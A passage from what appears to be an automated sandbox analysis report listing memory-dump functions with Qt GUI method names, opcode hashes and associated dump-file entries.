                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?intFormat@@FromLongLong_Property@Text
                                                                                                                                                                                                                                          • String ID: QTextTableFormat$columns$columns(self) -> int
                                                                                                                                                                                                                                          • API String ID: 1809571791-34484938
                                                                                                                                                                                                                                          • Opcode ID: 3292b3ee0fdc8a68880832a713d931a83d389c49d9603d63e04182419a762b9b
                                                                                                                                                                                                                                          • Instruction ID: 4f3bc8a71897aed2b90eec1b704c7cdb91ca9548425844a7ccfb3f5e3ea2877f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3292b3ee0fdc8a68880832a713d931a83d389c49d9603d63e04182419a762b9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1012D76A08B46D1EB109F61E8496A933E4FB44B94F914032D98E43364EF7DE599C344
                                                                                                                                                                                                                                          Function 00007FF89D969EB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setBool_Enabled@FromGrabKeyboardLongWindow@@
                                                                                                                                                                                                                                          • String ID: QWindow$setKeyboardGrabEnabled$setKeyboardGrabEnabled(self, grab: bool) -> bool
                                                                                                                                                                                                                                          • API String ID: 1802758380-1671088457
                                                                                                                                                                                                                                          • Opcode ID: 13961945c7752c22cae0dd617f93030b5996f14be50006fb7f048977731f9253
                                                                                                                                                                                                                                          • Instruction ID: a4eb8845501da95a6ea2aaf60110852ece4c0ed7aa3a3d69e0b2f53f6238a921
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13961945c7752c22cae0dd617f93030b5996f14be50006fb7f048977731f9253
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23111B36A18E46D1EB10DF20E8896A933E5FB44F84F914032DA9E43320EF3DE959C708
                                                                                                                                                                                                                                          Function 00007FF89D9ABA00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?slopeDoubleFloat_FromPainterPath@@Percent@
                                                                                                                                                                                                                                          • String ID: QPainterPath$slopeAtPercent$slopeAtPercent(self, t: float) -> float
                                                                                                                                                                                                                                          • API String ID: 1007492032-3960587637
                                                                                                                                                                                                                                          • Opcode ID: 1535b535a3df342ef32397d0a4ff477161ba16411e68eee956240f3ffdd4b9c3
                                                                                                                                                                                                                                          • Instruction ID: aa757cf8983ffff64873fcd5fa22704c6680727db0a340dbfbc960be69597b4e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1535b535a3df342ef32397d0a4ff477161ba16411e68eee956240f3ffdd4b9c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3011B76A18E46D5EB10DF20E8896A933E5FB44F94F914032DA9E03320EF39E95AC744
                                                                                                                                                                                                                                          Function 00007FF89D977AB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?intFormat@@FromLongLong_Property@Text
                                                                                                                                                                                                                                          • String ID: QTextImageFormat$quality$quality(self) -> int
                                                                                                                                                                                                                                          • API String ID: 1809571791-639887700
                                                                                                                                                                                                                                          • Opcode ID: 83b7c6af291b6bec72a0417fd8d950562b69cffc2d440985d49a830bd2f046be
                                                                                                                                                                                                                                          • Instruction ID: 6220ff5ef7effdc234e560b679dab1b11525657e1b3b0f392e53c9d98b778c28
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83b7c6af291b6bec72a0417fd8d950562b69cffc2d440985d49a830bd2f046be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2401E936A08A4A81EB109F61E8496A933A4FB44B91F914032CA9E47324EF7CE559C788
                                                                                                                                                                                                                                          Function 00007FF89D961E90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?minimumFromLongLong_Size@Size@@Window@@
                                                                                                                                                                                                                                          • String ID: QWindow$minimumHeight$minimumHeight(self) -> int
                                                                                                                                                                                                                                          • API String ID: 430898146-3833431472
                                                                                                                                                                                                                                          • Opcode ID: 8dc2d614a3480121789059e5ae555ff9bb5ef4130df8f4350c0bc5015d86bc81
                                                                                                                                                                                                                                          • Instruction ID: 23d048113e2a390649da565e3f6f89bdda02d8854011a16703ee954a357aafeb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dc2d614a3480121789059e5ae555ff9bb5ef4130df8f4350c0bc5015d86bc81
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D001D777A18B46C6DB109F25E8896A937A4FB44FD4F918032DA8E03324EF3DE559C748
                                                                                                                                                                                                                                          Function 00007FF89D96BE40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?boolBool_Format@@FromLongProperty@Text
                                                                                                                                                                                                                                          • String ID: QTextTableFormat$borderCollapse$borderCollapse(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 3344510876-2026970299
                                                                                                                                                                                                                                          • Opcode ID: bde2eaf5838d74e0fd3148c963eb3107dc0fd6a0350c89167d0660e498856b4e
                                                                                                                                                                                                                                          • Instruction ID: be326d83ee1454aa397dc4c57721c8fa369db3cc757758952eff4cf4aaaf8e30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bde2eaf5838d74e0fd3148c963eb3107dc0fd6a0350c89167d0660e498856b4e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14011E77A08A46D5EB10DF51E8496A933E4FB54F94F914032DA9E07320EF7CE599C344
                                                                                                                                                                                                                                          Function 00007FF89D996060 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?boolBool_Format@@FromLongProperty@Text
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$fontKerning$fontKerning(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 3344510876-3159943293
                                                                                                                                                                                                                                          • Opcode ID: 04320b374e9253e84794408e646076c375f54ba4eade018e346bf15dea2abbeb
                                                                                                                                                                                                                                          • Instruction ID: e25b6a6cf349366ca2408ba34c5993d618986d1e93d9905f722f645408302a17
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04320b374e9253e84794408e646076c375f54ba4eade018e346bf15dea2abbeb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2010876A08A86D1EB10DF51E8896A933E4FB44BD4F914032CA9E47320EF7DE669C344
                                                                                                                                                                                                                                          Function 00007FF89D981FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?intFormat@@FromLongLong_Property@Text
                                                                                                                                                                                                                                          • String ID: QTextBlockFormat$indent$indent(self) -> int
                                                                                                                                                                                                                                          • API String ID: 1809571791-2543352704
                                                                                                                                                                                                                                          • Opcode ID: 766e025b4b947819a0021f9d55b066909cba0f18f64231e54a63cd96a4d516c6
                                                                                                                                                                                                                                          • Instruction ID: 88937f2a49158d83bba6097181b24b2e4742d50990bd77cc8675abedcfe15c60
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 766e025b4b947819a0021f9d55b066909cba0f18f64231e54a63cd96a4d516c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63010C77A08A46C1EB109F61E8496A933E4FB44F94F918032DA9E43324EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D98FEB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
